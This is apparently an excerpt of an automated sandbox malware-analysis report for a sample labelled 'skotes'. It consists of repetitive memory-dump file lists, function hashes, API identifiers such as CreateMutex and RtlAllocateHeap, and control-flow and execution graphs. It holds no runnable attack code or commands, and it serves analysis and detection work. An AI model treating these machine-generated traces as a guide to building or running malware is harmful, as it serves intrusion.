                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: c08f9f7c12afb4bff4366499fd170e5eeb809f7056f1ac10c3848a97ea4bb864
                                                                                                                                                                                                                                                                • Instruction ID: c71b8e1ba35e493016d71b12acc754f71317416b105486f41b7812230a88bfc1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c08f9f7c12afb4bff4366499fd170e5eeb809f7056f1ac10c3848a97ea4bb864
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD2179327002059BEB18EB6CDC897ADB77ADFDA310F204219E408D76D1DB769980C692

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 351 9dd82f-9dd83a 352 9dd83c-9dd846 351->352 353 9dd848-9dd84e 351->353 352->353 354 9dd87c-9dd887 call 9d75f6 352->354 355 9dd867-9dd878 RtlAllocateHeap 353->355 356 9dd850-9dd851 353->356 360 9dd889-9dd88b 354->360 357 9dd87a 355->357 358 9dd853-9dd85a call 9d9dc0 355->358 356->355 357->360 358->354 364 9dd85c-9dd865 call 9d8e36 358->364 364->354 364->355
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009DA813,00000001,00000364,00000006,000000FF,?,009DEE3F,?,00000004,00000000,?,?), ref: 009DD871
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 2cb0baf9acc66f4dc2a9db96e469d4b686b415a6497e71355595748d87c1526e
                                                                                                                                                                                                                                                                • Instruction ID: c6ca32679d26490241a13a94cee78583411ff3e0a78486413cd0cf797cff49aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cb0baf9acc66f4dc2a9db96e469d4b686b415a6497e71355595748d87c1526e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBF0E9319C322576DB237A729C01B5B775DDF853B0B14C423FC0497381DA20DC01A6E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                                • Instruction ID: 9c4c01dd84c6e621ed0deabd471cf696590cfdce7777f0111f9db290957cfb66
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30B137B29442879FDB11CF68C8817AEBBE9EF85340F14C56BE955EB381D6348D02CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                                                                                • Opcode ID: 898308d5562d2bd362accce9e486774cb586b832d363585dba16a757fca2440e
                                                                                                                                                                                                                                                                • Instruction ID: 6a82eb96f6888dfaca0e0f7328ea2f23a7e341c21998e432b2577e1ec4289de3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 898308d5562d2bd362accce9e486774cb586b832d363585dba16a757fca2440e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9A1C1B0A05215DFEB20DFA4C945B9AB7A8FF56324F048139F815D7281EB35EA04CBD1

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:4.4%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                                                                                                                                                Signature Coverage:0.9%
                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                                                                                                                                                execution_graph 15880 33422c 15881 334263 15880->15881 15882 33424e 15880->15882 15886 3343df 15882->15886 15889 3343f9 15886->15889 15891 334448 15886->15891 15887 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15888 334253 15887->15888 15888->15881 15892 33c53d 15888->15892 15890 33c578 69 API calls 15889->15890 15889->15891 15890->15891 15891->15887 15893 33c548 15892->15893 15894 33c55d 15892->15894 15896 33ad6d __dosmaperr 14 API calls 15893->15896 15894->15893 15895 33c564 15894->15895 15902 33ae1d 15895->15902 15898 33c54d 15896->15898 15900 33b458 __strnicoll 29 API calls 15898->15900 15899 33c573 15899->15881 15901 33c558 15900->15901 15901->15881 15903 33ae30 _Fputc 15902->15903 15906 33b096 15903->15906 15905 33ae45 _Fputc 15905->15899 15908 33b0a2 ___scrt_is_nonwritable_in_current_image 15906->15908 15907 33b0a8 15909 33b601 __strnicoll 29 API calls 15907->15909 15908->15907 15910 33b0eb 15908->15910 15911 33b0c3 15909->15911 15917 33875f EnterCriticalSection 15910->15917 15911->15905 15913 33b0f7 15918 33afaa 15913->15918 15915 33b10d 15929 33b136 15915->15929 15917->15913 15919 33afd0 15918->15919 15920 33afbd 15918->15920 15932 33aed1 15919->15932 15920->15915 15922 33b081 15922->15915 15923 33aff3 15923->15922 15924 33b00e 15923->15924 15936 34424d 15923->15936 15926 33bc27 ___scrt_uninitialize_crt 64 API calls 15924->15926 15927 33b021 15926->15927 15950 344033 15927->15950 16001 338773 LeaveCriticalSection 15929->16001 15931 33b13e 15931->15911 15933 33aee2 15932->15933 15935 33af3a 15932->15935 15933->15935 15953 343ff3 15933->15953 15935->15923 15937 34461f 15936->15937 15938 344656 15937->15938 15939 34462e 15937->15939 15941 340efc _Fputc 29 API calls 15938->15941 15940 33b601 __strnicoll 29 API calls 15939->15940 15949 344649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15940->15949 15942 34465f 15941->15942 15963 344051 15942->15963 15945 344709 15966 3442a9 15945->15966 15947 344720 15947->15949 15978 344454 15947->15978 15949->15924 15951 344194 __fread_nolock 31 API calls 15950->15951 15952 34404c 15951->15952 15952->15922 15954 344007 _Fputc 15953->15954 15957 344194 15954->15957 15956 34401c _Fputc 15956->15935 15958 344cb0 _Fputc 29 API calls 15957->15958 15959 3441a6 15958->15959 15960 3441c2 SetFilePointerEx 15959->15960 15962 3441ae __fread_nolock 15959->15962 15961 3441da GetLastError 15960->15961 15960->15962 15961->15962 15962->15956 15985 34406f 15963->15985 15967 3442b8 _Fputc 15966->15967 15968 340efc _Fputc 29 API calls 15967->15968 15970 3442d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15968->15970 15969 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15972 344452 15969->15972 15971 344051 33 API calls 15970->15971 15977 3442e0 15970->15977 15973 344334 15971->15973 15972->15949 15974 344366 ReadFile 15973->15974 15973->15977 15975 34438d 15974->15975 15974->15977 15976 344051 33 API calls 15975->15976 15976->15977 15977->15969 15979 340efc _Fputc 29 API calls 15978->15979 15980 344467 15979->15980 15981 344051 33 API calls 15980->15981 15983 3444b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15980->15983 15982 34450e 15981->15982 15982->15983 15984 344051 33 API calls 15982->15984 15983->15949 15984->15983 15986 34407b ___scrt_is_nonwritable_in_current_image 15985->15986 15987 3440be 15986->15987 15989 344104 15986->15989 15995 34406a 15986->15995 15988 33b601 __strnicoll 29 API calls 15987->15988 15988->15995 15996 344ef9 EnterCriticalSection 15989->15996 15991 34410a 15992 34412b 15991->15992 15993 344194 __fread_nolock 31 API calls 15991->15993 15997 34418c 15992->15997 15993->15992 15995->15945 15995->15947 15995->15949 